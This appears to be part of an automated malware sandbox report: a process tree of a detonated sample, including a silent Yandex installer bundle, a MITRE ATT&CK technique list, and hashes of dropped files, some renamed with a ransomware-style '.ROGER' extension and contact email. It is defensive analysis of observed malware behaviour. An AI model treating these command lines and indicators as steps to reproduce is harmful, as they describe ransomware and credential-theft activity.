                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1356 -ip 1356
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:5468
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1356 -ip 1356
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:7752
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1356 -ip 1356
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:13152
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1356 -ip 1356
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:13452
                                                                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:9844
                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 26C4E0EA5E916C081DA99A3C95F3B562
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:8416
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\D175F692-8A9C-43A7-9E0E-DF0F4D7391E8\lite_installer.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\D175F692-8A9C-43A7-9E0E-DF0F4D7391E8\lite_installer.exe" --use-user-default-locale --silent --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --YABROWSER
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:11472
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\9F300555-C60C-4C06-9652-89E7D275D9EF\seederexe.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\9F300555-C60C-4C06-9652-89E7D275D9EF\seederexe.exe" "--yqs=y" "--yhp=y" "--ilight=" "--oem=" "--nopin=n" "--pin_custom=n" "--pin_desktop=n" "--pin_taskbar=y" "--locale=us" "--browser=y" "--browser_default=" "--loglevel=trace" "--ess=" "--clids=C:\Users\Admin\AppData\Local\Temp\clids-yasearch.xml" "--sender=C:\Users\Admin\AppData\Local\Temp\69CA41E6-0E8E-4B98-ABF9-2C6F8B3F4875\sender.exe" "--is_elevated=yes" "--ui_level=2" "--good_token=x" "--no_opera=n"
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:8684
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\69CA41E6-0E8E-4B98-ABF9-2C6F8B3F4875\sender.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\69CA41E6-0E8E-4B98-ABF9-2C6F8B3F4875\sender.exe --send "/status.xml?clid=2278730-666&uuid=95c04196-f2e9-4e0d-b4e3-fec1994b052d&vnt=Windows 10x64&file-no=8%0A10%0A11%0A12%0A13%0A17%0A18%0A20%0A21%0A22%0A25%0A36%0A40%0A42%0A43%0A57%0A61%0A89%0A102%0A103%0A123%0A124%0A125%0A129%0A"
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:9020
                                                                                                                                                                                                                                • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                                  werfault.exe /h /shared Global\63c0781a220e4513a5224897cde114b3 /t 5176 /p 13532
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:12472
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 1356 -ip 1356
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:6360
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1356 -ip 1356
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:4344
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 1356 -ip 1356
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:11048
                                                                                                                                                                                                                                        • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                                          werfault.exe /h /shared Global\6e881471585c495da8297c8b09a6f472 /t 11428 /p 12940
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:6204
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 1356 -ip 1356
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:10692
                                                                                                                                                                                                                                            • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                                              werfault.exe /h /shared Global\30f6bc2b4f444ce3accce2fcfac3bbf6 /t 15080 /p 13260
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:15152
                                                                                                                                                                                                                                              • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                                                werfault.exe /h /shared Global\f99823bcea7b4a998618924c75225927 /t 3504 /p 5420
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:11800
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 1356 -ip 1356
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:6328
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 1356 -ip 1356
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:760
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1356 -ip 1356
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:2536
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4728 -ip 4728
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:4256
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 4728 -ip 4728
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:14264
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 4728 -ip 4728
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:9748
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 4728 -ip 4728
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:9736
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 4728 -ip 4728
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:6236
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4728 -ip 4728
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:14072
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4728 -ip 4728
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:14076
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 4728 -ip 4728
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:10132
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4728 -ip 4728
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:7900
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4728 -ip 4728
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:12784
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 4728 -ip 4728
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:10504
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 4728 -ip 4728
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:14760
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4728 -ip 4728
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:7416
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 852 -p 4728 -ip 4728
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:8456
                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe
                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --run-as-service
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:6696
                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe
                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=488dca4c15f9a1d330ad312b391a804e --annotation=main_process_pid=6696 --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.10.2.705 --initial-client-data=0x258,0x25c,0x260,0x234,0x264,0x3ce784,0x3ce790,0x3ce79c
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:12424
                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe
                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --update-scheduler
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:11192
                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe
                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --update-background-scheduler
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:13132
                                                                                                                                                                                                                                                                                          • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:9428
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 876 -p 4728 -ip 4728
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:11048
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 4728 -ip 4728
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:10860
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\AUDIODG.EXE 0x314 0x4fc
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:10572
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 872 -p 4728 -ip 4728
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:10252

                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                    Reconnaissance

                                                                                                                                                                                                                                                                                                    Resource Development

                                                                                                                                                                                                                                                                                                    Initial Access

                                                                                                                                                                                                                                                                                                    Execution

                                                                                                                                                                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1053.005

                                                                                                                                                                                                                                                                                                    Windows Management Instrumentation

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1047

                                                                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1547

                                                                                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1547.001

                                                                                                                                                                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1053.005

                                                                                                                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1547

                                                                                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1547.001

                                                                                                                                                                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1053.005

                                                                                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                                                                                    Direct Volume Access

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1006

                                                                                                                                                                                                                                                                                                    File and Directory Permissions Modification

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1222

                                                                                                                                                                                                                                                                                                    Indicator Removal

                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                    T1070

                                                                                                                                                                                                                                                                                                    File Deletion

                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                    T1070.004

                                                                                                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                                                                                                    Subvert Trust Controls

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1553

                                                                                                                                                                                                                                                                                                    SIP and Trust Provider Hijacking

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1553.003

                                                                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                                                                                                    Credentials from Password Stores

                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                    T1555

                                                                                                                                                                                                                                                                                                    Credentials from Web Browsers

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1555.003

                                                                                                                                                                                                                                                                                                    Windows Credential Manager

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1555.004

                                                                                                                                                                                                                                                                                                    Unsecured Credentials

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1552

                                                                                                                                                                                                                                                                                                    Credentials In Files

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1552.001

                                                                                                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                                                                                                    Browser Information Discovery

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1217

                                                                                                                                                                                                                                                                                                    Network Service Discovery

                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                    T1046

                                                                                                                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                    T1120

                                                                                                                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                                                                                                                    8
                                                                                                                                                                                                                                                                                                    T1012

                                                                                                                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                                                                                                                    6
                                                                                                                                                                                                                                                                                                    T1082

                                                                                                                                                                                                                                                                                                    System Location Discovery

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1614

                                                                                                                                                                                                                                                                                                    System Language Discovery

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1614.001

                                                                                                                                                                                                                                                                                                    System Time Discovery

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1124

                                                                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                                                                    Lateral Movement

                                                                                                                                                                                                                                                                                                    Collection

                                                                                                                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1005

                                                                                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                                                                                    Exfiltration

                                                                                                                                                                                                                                                                                                    Impact

                                                                                                                                                                                                                                                                                                    Inhibit System Recovery

                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                    T1490

                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                    • C:\Config.Msi\e59c899.rbs
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      911B

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      75295f6e51dafea9bc70647c6b387ffa

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      d05a578b772f21b000151863d23e318752dd745b

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      334fa0a14761b1b943549c0a2492dff2c64cd9704bb2cc7eff4570cec11a3d43

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      1bdb8ecf9546d248716d2bc17a82cf27d390ddb374273b02291c4f39368302df8159ba995b75ad753e0853737f54eb1ba39fc226da07253ba08ba957697edae2

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Project2_v1.2\kotlock1.2.exe
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      4f215d9db65f0d9205554fbd87f47812

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      0433ca2dc74fa246f0e6c4b3871ac334555b9e4c

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      7778c4872e33540089b30502a730ea40bb630abc513eb0eac0b99d96dc62d083

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      f1e334831a98052918f49b0b1de980164a2fa9794e398ad604ed7a08b588cf8b5a080fea2e54af05def826fe20918373adf8f358aae2dc0d2f8770ae7f5e6fec

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      2.4MB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      fc97164a5dddd55d2d1ac6cc6156771d

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      cf7953ef61fd18941d2f9c1599ad01d5d57dd987

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      778a127b88bb644a7c66d08932a446b85409fe7049bbae0dc15b9d364f2870f4

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      d7ca2fc40a6dde28a567f86b5beb87c867f01e6832d7a49eafa9b3987b7e9ee992f6d5104181f19888f6e0af45a7e90b17ebeae489e3956fd537ce1ba02bc79c

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Program Files\7-Zip\7z.dll.id-9D8A595E.[[email protected]].ROGER
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      6387ec6d0b9314e9ca8f8a80222374f6

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      159b5664915d31dcb3a473a0332e749eb129d19a

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      2b7f85ee8d7d852972149574d4e9c2947eec1bb86d93502a6843dd3bb6346fc7

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      eabe21d512f353d2c574b5d149e42865907d090e6538255e9c44e0dfe3e02b4a4de8322fe746bd8f9bf2baa0d41344ecfb2c7388f2b174c5c2492af3bf9389a4

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.id-9D8A595E.[[email protected]].ROGER
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4.0MB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      6977a2463895cc740fe014f6234af338

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      a2cd55ddaa68fe171476a026dfbeebdb3cfd9aa3

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      758bf6a430a8b9dc9b7ef3379638469001e8662fd4e17c53134cd1e71174478f

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      e0a501d1ca8cba60c9c8ec022926edc2e8ce476e830f1f3981c77dd647b76b182def757e1f1234913cc672bc0ab3a38cb01787cc2864eee7e5ff50413ca64c9c

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\ProgramData\Yandex\YandexBrowser\service_update.log
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      9067be6eec7bf6fe8fe8efd44218a4d8

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      383aa29570696cfa1eaf3f247b63317d7561abed

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      17bbb2ee621b26e3f7201a5c821183461b530aa188ffa1e7aa01fabab5d1ae1d

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      b8859982f49ff1a73f1f09064f91475c00cdfa850acacf7b23b8a1bc2c82c8527ea89546e8d32cc6ff04a2d7b74690887430d13942a716e9a0a9c184f3c1d25c

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\ProgramData\Yandex\YandexBrowser\service_update.log
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      4ea0586d5d2da2414cfc9fe4537e148a

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      c6141e59c536c5bf49a9c8d8b6f4e7f7b1fcd46b

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      cc5b0d69d7fccc4c80ce36e2993367bcdab0540f76bc38f610e02e037958ac93

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      82c330da1d3e552ce9a2769955bc7a9d992bfc32ce62446763b1a04e6bcb64ebc2374fea1f466909776253cff9430c64b684c72cbbd4cf81a05267013718e732

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      d2fb266b97caff2086bf0fa74eddb6b2

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      4B

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      f49655f856acb8884cc0ace29216f511

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      6bd369f7c74a28194c991ed1404da30f

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
